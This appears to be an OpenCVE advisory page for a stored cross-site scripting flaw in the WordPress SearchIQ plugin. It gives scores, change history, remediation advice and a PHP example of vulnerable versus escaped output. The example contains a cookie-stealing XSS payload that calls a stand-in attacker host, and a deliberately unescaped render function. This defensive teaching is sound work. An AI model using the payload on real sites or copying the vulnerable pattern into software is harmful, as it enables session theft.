Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ searchiq allows Stored XSS. This issue affects SearchIQ: from n/a through <= 4.7.
Published: 2025-03-27
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An attacker can inject malicious scripts that are stored in the SearchIQ plugin and executed in the browsers of users who view the affected content, leading to defacement, credential theft or session hijacking. This Stored XSS flaw arises from not properly neutralizing input when generating plugin pages, a classic example of CWE‑79.

Affected Systems

WordPress sites running the SearchIQ plugin (CPE cpe:2.3:a:searchiq:searchiq:*:*:*:*:*:wordpress:*:*) at version 4.7 or earlier. The advisory gives no lower bound ("from n/a"), so every release up to and including 4.7 should be treated as affected.

Risk and Exploitability

The CVSS 3.1 base score of 6.5 (vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) indicates moderate severity: the flaw is reachable over the network with low attack complexity, but it requires low privileges (an authenticated account on the site that can submit the stored value) and user interaction (a victim must load the page that carries the payload). Scope is "changed" because the injected script executes in the victim's browser rather than inside the plugin itself. The EPSS score of less than 1% indicates a very low probability of exploitation in the wild, the vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment records Exploitation: none and Automatable: no. The advisory does not name the exact input field; the likely vector is the plugin's search interface or its administrative settings, where user-supplied text is stored without sanitization and later emitted into pages viewed by other users. No privilege escalation beyond that initial account is needed, and the impact is confined to the affected site and the sessions of its visitors.

Generated by OpenCVE AI on May 1, 2026 at 12:54 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the SearchIQ plugin to a release newer than 4.7. The advisory lists no fixed version, so confirm from the plugin changelog or the Patchstack advisory that the release you deploy actually contains the XSS fix before relying on it.
  • If an upgrade is not feasible immediately, completely disable or uninstall the SearchIQ plugin to prevent the vulnerability from being exposed.
  • For any theme or custom code that echoes values the plugin stores, escape on output for the HTML context in use (esc_html() for element text, esc_attr() for attribute values, esc_url() for href/src, wp_kses_post() where limited markup is intended) rather than relying on input filtering alone, since output encoding is what actually neutralizes CWE‑79.
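The following is an added illustration of the pattern behind this class of bug and of the output-encoding fix recommended above. It is not the SearchIQ plugin's code and does not reproduce the actual vulnerable field, which the advisory does not identify; every function, option and host name in it is invented. It defines plain-PHP stand-ins for WordPress's esc_html() and esc_attr() so the file runs under the `php` CLI outside WordPress; inside WordPress the core helpers are used instead.

```php
<?php
// Added example for CVE-2025-30867. This is NOT the SearchIQ plugin's code:
// it models the generic WordPress pattern behind a stored XSS in a plugin
// settings page. Every function, option and host name below is invented.
//
// Stand-ins for WordPress escaping helpers so the file runs under plain
// `php` on the CLI. Inside WordPress, core's esc_html()/esc_attr() already
// exist and these definitions are skipped; for the characters that matter
// here (& < > " ') the behaviour is the same.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// VULNERABLE write path: any request that reaches this handler stores
// arbitrary text verbatim. (Hypothetical; not what SearchIQ does.)
function save_placeholder_vulnerable(array &$options, string $raw): void {
    $options['search_placeholder'] = $raw;
}

// HARDENED write path: refuse the write unless the caller holds the right
// capability and a valid nonce, then strip markup before storing. In
// WordPress use current_user_can('manage_options'), check_admin_referer()
// and sanitize_text_field(); strip_tags()+trim() is the plain-PHP analogue.
function save_placeholder_hardened(array &$options, string $raw, bool $has_cap, bool $nonce_ok): bool {
    if (!$has_cap || !$nonce_ok) {
        return false;
    }
    $options['search_placeholder'] = trim(strip_tags($raw));
    return true;
}

// VULNERABLE render: the stored value is concatenated into an attribute and
// into element text with no encoding, so '">' closes the attribute and a
// <script> tag is emitted live into the page every visitor loads.
function render_vulnerable(array $options): string {
    $p = $options['search_placeholder'] ?? '';
    return '<input type="text" name="s" placeholder="' . $p . '">'
         . '<p class="hint">' . $p . '</p>';
}

// HARDENED render: encode for the context each value lands in. Escaping on
// output is the fix for CWE-79; the write-path checks are defence in depth.
function render_hardened(array $options): string {
    $p = $options['search_placeholder'] ?? '';
    return '<input type="text" name="s" placeholder="' . esc_attr($p) . '">'
         . '<p class="hint">' . esc_html($p) . '</p>';
}

// Cheap self-check a reviewer can run over rendered output: does a raw
// <script tag survive? (A real audit would also look for event-handler
// attributes, javascript: URLs and unquoted attribute values.)
function contains_script_tag(string $html): bool {
    return preg_match('/<script\b/i', $html) === 1;
}

// Constructed attacker payload: closes the placeholder attribute, then
// sends the victim's cookies to a hypothetical attacker-controlled host.
$payload = '"><script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

$vuln = [];
save_placeholder_vulnerable($vuln, $payload);
$vulnHtml = render_vulnerable($vuln);

$safe = [];
save_placeholder_hardened($safe, $payload, true, true);
$safeHtml = render_hardened($safe);

// Even if the write-path sanitizer were bypassed, output escaping alone
// neutralises the stored payload:
$escapedOnly = render_hardened($vuln);

printf("vulnerable render contains live <script>:  %s\n", contains_script_tag($vulnHtml) ? 'yes' : 'no');
printf("hardened render contains live <script>:    %s\n", contains_script_tag($safeHtml) ? 'yes' : 'no');
printf("escape-only render contains live <script>: %s\n", contains_script_tag($escapedOnly) ? 'yes' : 'no');
printf("write refused for an unprivileged caller:  %s\n", save_placeholder_hardened($safe, $payload, false, true) ? 'no' : 'yes');
echo "\n", $escapedOnly, "\n";
```

Run it with `php example.php`: the vulnerable render emits the `<script>` element intact, while both hardened renders turn `"` and `<` into `&quot;` and `&lt;`, so the browser sees inert text inside the attribute and the paragraph. The escape-only case is the important one: output encoding is the control that holds even when the stored data is already poisoned, which is exactly the situation a site is in after this CVE has been exploited but before the offending value has been cleaned out of the database.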



Advisories
Source: EUVD
ID: EUVD-2025-8330
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7.
History

Thu, 23 Apr 2026 15:00:00 +0000

Metrics (cvssV3_1)
  Removed: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}
  Added:   {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Description
  Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7.
  Added:   Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ searchiq allows Stored XSS. This issue affects SearchIQ: from n/a through <= 4.7.
References (no values listed)
Metrics (cvssV3_1)
  Removed: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}
  Added:   {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


Mon, 09 Jun 2025 19:30:00 +0000

First Time appeared
  Added: Searchiq; Searchiq searchiq
CPEs
  Added: cpe:2.3:a:searchiq:searchiq:*:*:*:*:*:wordpress:*:*
Vendors & Products
  Added: Searchiq; Searchiq searchiq

Thu, 27 Mar 2025 14:15:00 +0000

Metrics (ssvc)
  Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 27 Mar 2025 11:00:00 +0000

Description
  Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SearchIQ SearchIQ allows Stored XSS. This issue affects SearchIQ: from n/a through 4.7.
Title
  Added: WordPress SearchIQ plugin <= 4.7 - Cross Site Scripting (XSS) vulnerability
Weaknesses
  Added: CWE-79
References (no values listed)
Metrics (cvssV3_1)
  Added: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:59.231Z

Reserved: 2025-03-26T09:21:08.359Z

Link: CVE-2025-30867

Vulnrichment

Updated: 2025-03-27T13:18:17.816Z

NVD

Status : Modified

Published: 2025-03-27T11:15:47.960

Modified: 2026-04-23T15:27:13.450

Link: CVE-2025-30867

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T13:00:12Z

Weaknesses